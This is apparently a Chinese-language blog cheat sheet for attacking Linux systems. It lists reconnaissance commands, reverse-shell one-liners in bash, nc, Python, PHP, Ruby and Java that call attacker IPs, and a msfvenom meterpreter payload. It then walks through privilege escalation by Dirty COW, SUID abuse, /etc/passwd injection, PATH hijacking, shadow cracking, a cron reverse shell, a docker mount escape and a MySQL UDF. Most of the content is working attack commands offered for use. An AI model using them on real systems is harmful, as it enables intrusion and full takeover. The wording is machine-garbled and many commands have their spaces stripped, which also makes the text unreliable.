常用命令
uname -a # 查看内核/操作系统/cpu信息
hend -n 1 /etc/issue # 查看操作系统版本
cat /proc/version # 查看系统信息
hostname # 查看计算机名
env # 查看环境变量
ifconfig # 查看网卡
netstat -lntp # 查看所有监听端口
netstat -antp # 查看所有已经建立的连接
netstat -s # 查看网络统计信息
iptables -L # 查看防火墙设置
route -n # 查看路由表
ps -ef # 查看所有进程
top # 实时显示进程状态
w # 查看活动用户
id # 查看指定用户信息
last # 查看用户登录日志
cut -d: -f1 /etc/passwd # 查看系统所有用户
cut -d: -f1 /etc/group # 查看系统所有组
crontab -l # 查看当前用户的计划任务
chkconfig –list # 列出所有系统服务
chkconfig –list | grep on # 列出所有启动的系统服务
echo $PATH # 查看系统路径
大跌shell
在本地使用nc进行窃听
nc-lvnp8888
bash大跌shell
bash -i >& /dev/tcp/ip_address/port 0>&1
bash -c "bash -i >& /dev/tcp/192.168.0.189/6666 0>&1"
nc大跌shell
nc -e /bin/sh 192.168.2.130 4444
# 但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
python大跌shell
import socket,subprocess,os
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "192.168.2.130" , 4444 ))
os.dup2(s.fileno(), 0 )
os.dup2(s.fileno(), 1 )
os.dup2(s.fileno(), 2 )
p = subprocess.call([ "/bin/bash" , "-i" ])
php大跌shell
php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i &3 2>&3");'
ruby大跌shell
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i
&%d 2>&%d",f,f,f)'
Java大跌shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5/dev/tcp/10.0.0.1/2002;cat &5 >&5; done"] as String[])
p.waitFor()
xterm大跌shell
xterm -display 10.0.0.1:1
python调用本地shell实现交互式命令行
终端有些时侯系统的命令终端不准许直接访问linux学习论坛,可以使用python虚拟化一个终端来执行
# python2
python -c 'import pty;pty.spawn("/bin/bash")'
# python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
Linux大跌shell解决乱码
ctrl+z放置后台任务设置原始格式
stty -echo raw
fg再调用后台任务
LINUX内核漏洞加壳
一般我们在拥有一个webshell的时侯,通常权限都是WEB容器权限,如在iis就是iis用户组权限,在apache就是apache权限,通常都是权限较低,均可执行一些普通命令linux怎么切换到root用户,如查看当前用户,网路信息,ip信息等。假如我想进行外网渗透就必须将权限加壳到最高,如系统权限超级管理员权限。
内核溢出加壳
借助堆栈溢出漏洞,按照当前系统找寻对应的漏洞的exp使用exp对其进行加壳。
使用以下命令进行信息搜集
uname -a
cat /proc/version
cat /etc/issue
cat /etc/redhat-release
lsb_release -a
按照linux的内核版本去找对应的exp
使用kali自带的工具进行搜索exp
searchsploit -t Ubuntu 14.04
searchsploit -s Ubuntu 14.04
searchsploit -s Linux Kernel 3.13.0
查看描述
searchsploit-xlinux/local/37088.c
在目标机器上使用wget下载源代码之后使用gcc进行编译
python3 -m http.service 80
wget http://192.168.150.145/exp.c
gcc exp.c -o exp
chmod 777 exp
./exp
脏牛加壳CVE-2016-5195
该漏洞是Linux内核的显存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞,造成可以破坏私有只读显存映射。黑客可以在获取低权限的的本地用户后,借助此漏洞获取其他只读显存映射的写权限,进一步获取root权限。
测试环境ubuntu14.04
exp下载地址:
在靶场上新建普通用户lian密码123456
gcc -pthread dirtyc0w.c -o dirtyc0w
chmod +x dirtycow
./dirtycow /etc/group "$(sed '/(sudo*)/ s/$/,lian/' /etc/group)"
早已加入到sodu组可以切换root用户
metasploitlinux加壳简介
Metasploit是一款开源的安全漏洞检查工具,可以帮助安全和IT专业人士辨识安全性问题,验证漏洞的减轻举措,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这种功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了她们的发觉。
使用metasploitlinux加壳
生成功击荷载
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.150.145 LPORT=12345 -f raw >
/var/www/html/shell.php
file_put_contents('m.php',file_get_contents('http://192.168.150.145/msf.php'));
msfconsole窃听
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.150.145
set lport 12345
exploit
访问就可以得到一个回调shell
使用模块查询漏洞
runpost/multi/recon/local_exploit_suggester
shell使用终端
wget https://www.exploit-db.com/exploits/37292
gcc 37292.c -o exp
chmod +x exp
./exp
假如成功都会得到一个root
suid加壳简介
SUID是赋于文件的一种权限,它会出现在文件拥有者权限的执行位上linux怎么切换到root用户,具有这些权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。也就是假如ROOT用户给某个可执行文件加了S权限,这么该执行程序运行的时侯将拥有ROOT权限。
以下命令可以发觉系统上运行的所有SUID可执行文件
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} ;
借助
我们使用find进行加壳
find.-exec/bin/sh-p;-quit
常见suid加壳文件有
nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget
具体的可以参考网站:
passwd文件替换加壳简介
听名子就晓得我们想要重新生成一个passwd文件之后去替换passwd文件,最后使用高权限用户进行加壳。
借助条件:
passwd文件可读可写(基本上不可能)
借助
查看/etc/passwd是否可写
ls-al/etc/passwd
把原先/etc/passwd中的文件进行复制
通过OpenSSLpasswd生成一个新的用户hacker,密码为hack123
opensslpasswd-1-salthackerhack123
111hacker$0vnQaCNuzDe3w9d6jHfXQ0
将其追加到之前的/etc/passwd文件中
hacker:111hacker$0vnQaCNuzDe3w9d6jHfXQ0:0:0:/root:/bin/bash
我们把文件放在远程服务器上使用wget进行下载出来
之后替换passwd文件
cp/tmp/passwd/etc/passwd
我们早已替换成功了使用suhacker切换用户
ssh秘钥加壳借助方式
尝试是否还能查看用户目录下的id_rsad文件
查看拥有/bin/bash的用户
cat/etc/passwd|grepbash
cd到/home/web1/.ssh下瞧瞧有没有远程登陆文件
file
我们把id_rsa文件复制到本地赋权后使用ssh进行登陆
chmod 600 id_rsa
ssh -i id_rsa web1@192.168.150.156
环境绑架加壳
环境绑架须要的两个条件
找寻suid文件
find/-perm-u=s-typef2>/dev/null
剖析文件发觉是一个查询进行的命令所以上面应当是用ps命令
这个二补码文件运行许的时侯一定是调用了ps命令,在/tmp命令下创建ps文件上面使用/bin/bash执
行命令
把tmp的路径添加到当前环境路径,再访问/script目录执行shell文件,准许的时侯首先会采用/tmp目
录的ps文件作为命令
所以可以挟持root权限进行命令执行
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /script
./shell
john破解shadowroot密文登陆加壳借助条件借助
cat/etc/shadow复印内容复制到一个文件中
使用john进行破解
john会手动检查密文类型--wordlist密码数组文件
john--wordlist="/usr/share/wordlists/rockyou.txt"passwd.txt
这个工具有的时侯才能破解下来,有的时侯不行。
我们可以借助破解下来的密码进行登陆,以获取一个更高的权限。
Ubuntu计划任务回调shell加壳
当获取一个linux普通用户的时,查看计划任务
cat/etc/crontab
尝试更改test.sh文件为回调shell
bash-i>&/dev/tcp/192.168.150.145/77770>&1
在kali上再开一个nc窃听
nc-lvnp7777
成功获取一个root权限
借助docker加壳
docker是一个容器可以在同一台机子虚拟多台服务。
输入命令id和group查询当前用户信息和组信息发觉存在docker组
输入命令下载使用容器把容器的目录挂载到寄主的根目录
dockerrun-v/:/mnt-italpine
访问寄主的/etc/shadow
cat/mnt/etc/shadow
sudo加壳简介
sudo是一种权限管理机制,管理员可以授权于一些普通用户去执行一些root执行的操作,而不须要晓得root的密码。
首先通过信息搜集,查看是否存在sudo配置不当的可能。假如存在,找寻低权限sudo用户的密码,因而加壳。
sudo -l # 列出目前用户可执行与无法执行的指令。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存出来直接上传(img-bKtdJRsM-74)()]
可以看见可以使用root特权下的cat命令,所以可以读取任何文件
原理
一般运维会将一些须要sudo的命令集成到某个用户或则某个组linux文本编辑器,之后在/etc/sudoers文件内进行设置
首先设置chmod+wcat/etc/sudoers使用vi对其编辑保存即可
# User privilege specification
root ALL=(ALL:ALL) ALL
moonsec ALL=(root) NOPASSWD:/bin/cat
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on "#include" directives:
NOPASSWD不须要密码使用cat命令而且具有特权权限。
linuxmysqludf加壳
假如在linux中存在mysql,可以试用mysql加壳并且概率不会太大
查看是否存在plugin目录
showvariableslike'%plugin%';
在kali在中使用以下命令进行上传udf.so文件
cd /usr/share/sqlmap/extra/cloak/
sudo python cloak.py -d -i
/usr/share/sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
lib_mysqludf_sys.so
进行解码
wget http://192.168.0.109/lib_mysqludf_sys.so
登陆mysql创建函数
usemysql
创建函数
create function sys_eval returns string soname "udf.so";
select sys_eval('id');
加壳失败的缘由
sudo ln -s /etc/apparmor.d/usr.sbin.mysqld /etc/apparmor.d/disable/
sudo apparmor_parser -R /etc/apparmor.d/usr.sbin.mysqld
借助加壳信息搜集脚本LinEnum
GitHub下载地址:
下载执行
wget-O-|bash
linuxprivchecker
python2版本:
python3版本:
python3 linuxprivchecker.py
linux-exploit-suggester2
GitHub下载地址:
手动检查
./linux-exploit-suggester-2.pl
指定版本
./linux-exploit-suggester-2.pl-k3.0.0
文章评论